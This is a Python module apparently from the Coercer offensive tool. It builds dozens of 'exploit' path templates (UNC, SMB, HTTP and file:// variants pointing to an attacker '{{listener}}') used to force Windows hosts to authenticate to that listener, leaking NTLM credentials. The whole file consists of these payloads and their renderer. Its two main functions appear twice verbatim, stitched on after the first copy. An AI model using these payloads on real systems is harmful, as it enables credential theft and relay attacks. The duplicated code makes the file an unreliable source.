coercer.core.utils
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : utils.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022


import random
import jinja2


def gen_random_name(length=8):
    """Return a pseudo-random alphanumeric string of ``length`` characters.

    Args:
        length: number of characters to draw; a value <= 0 yields ``""``.

    Returns:
        A ``str`` drawn from ``[a-zA-Z0-9]``. Within this module the value
        is only used as a throwaway path component (the ``rnd(n)`` template
        helper), so the non-cryptographic ``random`` module is adequate.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    return "".join(random.choices(alphabet, k=length))


def generate_exploit_templates(desired_auth_type=None):
    """Return the ``(auth_type, template)`` pairs defined in this module.

    Every template is a Jinja2 string meant to be rendered by
    :func:`generate_exploit_path_from_template`; ``auth_type`` is either
    ``"smb"`` or ``"http"``.

    Args:
        desired_auth_type: when not ``None``, only pairs whose ``auth_type``
            equals this value are returned (an unknown value yields an empty
            list). ``None`` returns every pair.

    Returns:
        A new ``list`` of ``(auth_type, template)`` tuples in definition order.
    """
    # Kept disabled: the second template group is not part of the default set.
    add_uncommon_tests = False

    common_templates = [
        # Only ip
        ("smb", '{{listener}}\x00'),
        # SMB
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with ?
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with .
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ?
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ??
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with .
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # HTTP
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\x00'),
    ]

    uncommon_templates = [
        # HTTP
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\File.txt\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),

        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/File.txt\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}\x00'),

        ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\x00'),
        ("smb", '\\UNC\\{{listener}}\\\x00'),
        ("smb", '\\UNC\\{{listener}}\x00'),

        ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
        ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\x00'),
        ("smb", 'UNC\\{{listener}}\\\x00'),
        ("smb", 'UNC\\{{listener}}\x00'),

        ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\\x00'),
        ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\x00'),
        ("smb", 'UNC:\\{{listener}}\\\x00'),
        ("smb", 'UNC:\\{{listener}}\x00'),

        ("http", 'http://{{listener}}/EndpointName/File.txt\x00'),
        ("http", 'http://{{listener}}/EndpointName/\x00'),
        ("http", 'http://{{listener}}/\x00'),
        ("http", 'http://{{listener}}\x00'),

        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\File.txt\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\x00'),
    ]

    templates = list(common_templates)
    if add_uncommon_tests:
        templates.extend(uncommon_templates)

    if desired_auth_type is None:
        return list(templates)
    return [
        (auth_type, template)
        for auth_type, template in templates
        if auth_type == desired_auth_type
    ]


def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445):
    """Render one template from :func:`generate_exploit_templates` into a path.

    Args:
        template: Jinja2 template string. It may reference ``listener``,
            ``smb_listen_port``, ``http_listen_port`` and the ``rnd(n)``
            helper. Rendering uses a plain, unsandboxed ``jinja2.Template``,
            so only the module's own template strings should reach this
            function, never text taken from an untrusted source.
        listener: host name or address substituted for ``{{listener}}``.
        http_listen_port: HTTP port, rendered as ``"@<port>"``; ``None``
            falls back to ``"@80"``.
        smb_listen_port: SMB port, rendered as ``"@<port>"`` unless it is
            ``None`` or the default 445, in which case it renders as ``""``.

    Returns:
        The rendered path as a ``str``.
    """
    # Only a non-default SMB port gets an explicit "@port" suffix.
    if smb_listen_port is None or smb_listen_port == 445:
        smb_suffix = ""
    else:
        smb_suffix = "@%d" % smb_listen_port

    # The HTTP port is always spelled out; None falls back to port 80.
    http_suffix = "@80" if http_listen_port is None else "@%d" % http_listen_port

    context = {
        "listener": listener,
        "rnd": gen_random_name,
        "http_listen_port": http_suffix,
        "smb_listen_port": smb_suffix,
    }
    return jinja2.Template(template).render(**context)
def generate_exploit_templates(desired_auth_type=None):
    """Return the ``(auth_type, template)`` pairs defined in this module.

    Every template is a Jinja2 string meant to be rendered by
    :func:`generate_exploit_path_from_template`; ``auth_type`` is either
    ``"smb"`` or ``"http"``.

    Args:
        desired_auth_type: when not ``None``, only pairs whose ``auth_type``
            equals this value are returned (an unknown value yields an empty
            list). ``None`` returns every pair.

    Returns:
        A new ``list`` of ``(auth_type, template)`` tuples in definition order.
    """
    # Kept disabled: the second template group is not part of the default set.
    add_uncommon_tests = False

    common_templates = [
        # Only ip
        ("smb", '{{listener}}\x00'),
        # SMB
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with ?
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\x00'),
        # SMB path with .
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ?
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with ??
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # UNC path with .
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
        # HTTP
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\x00'),
    ]

    uncommon_templates = [
        # HTTP
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\File.txt\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),

        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/File.txt\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/\x00'),
        ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}\x00'),

        ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\x00'),
        ("smb", '\\UNC\\{{listener}}\\\x00'),
        ("smb", '\\UNC\\{{listener}}\x00'),

        ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
        ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\x00'),
        ("smb", 'UNC\\{{listener}}\\\x00'),
        ("smb", 'UNC\\{{listener}}\x00'),

        ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\\x00'),
        ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\x00'),
        ("smb", 'UNC:\\{{listener}}\\\x00'),
        ("smb", 'UNC:\\{{listener}}\x00'),

        ("http", 'http://{{listener}}/EndpointName/File.txt\x00'),
        ("http", 'http://{{listener}}/EndpointName/\x00'),
        ("http", 'http://{{listener}}/\x00'),
        ("http", 'http://{{listener}}\x00'),

        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\File.txt\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\\\x00'),
        ("http", 'file://\\\\{{listener}}\\EndpointName\x00'),
    ]

    templates = list(common_templates)
    if add_uncommon_tests:
        templates.extend(uncommon_templates)

    if desired_auth_type is None:
        return list(templates)
    return [
        (auth_type, template)
        for auth_type, template in templates
        if auth_type == desired_auth_type
    ]
def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445):
    """Render one template from :func:`generate_exploit_templates` into a path.

    Args:
        template: Jinja2 template string. It may reference ``listener``,
            ``smb_listen_port``, ``http_listen_port`` and the ``rnd(n)``
            helper. Rendering uses a plain, unsandboxed ``jinja2.Template``,
            so only the module's own template strings should reach this
            function, never text taken from an untrusted source.
        listener: host name or address substituted for ``{{listener}}``.
        http_listen_port: HTTP port, rendered as ``"@<port>"``; ``None``
            falls back to ``"@80"``.
        smb_listen_port: SMB port, rendered as ``"@<port>"`` unless it is
            ``None`` or the default 445, in which case it renders as ``""``.

    Returns:
        The rendered path as a ``str``.
    """
    # Only a non-default SMB port gets an explicit "@port" suffix.
    if smb_listen_port is None or smb_listen_port == 445:
        smb_suffix = ""
    else:
        smb_suffix = "@%d" % smb_listen_port

    # The HTTP port is always spelled out; None falls back to port 80.
    http_suffix = "@80" if http_listen_port is None else "@%d" % http_listen_port

    context = {
        "listener": listener,
        "rnd": gen_random_name,
        "http_listen_port": http_suffix,
        "smb_listen_port": smb_suffix,
    }
    return jinja2.Template(template).render(**context)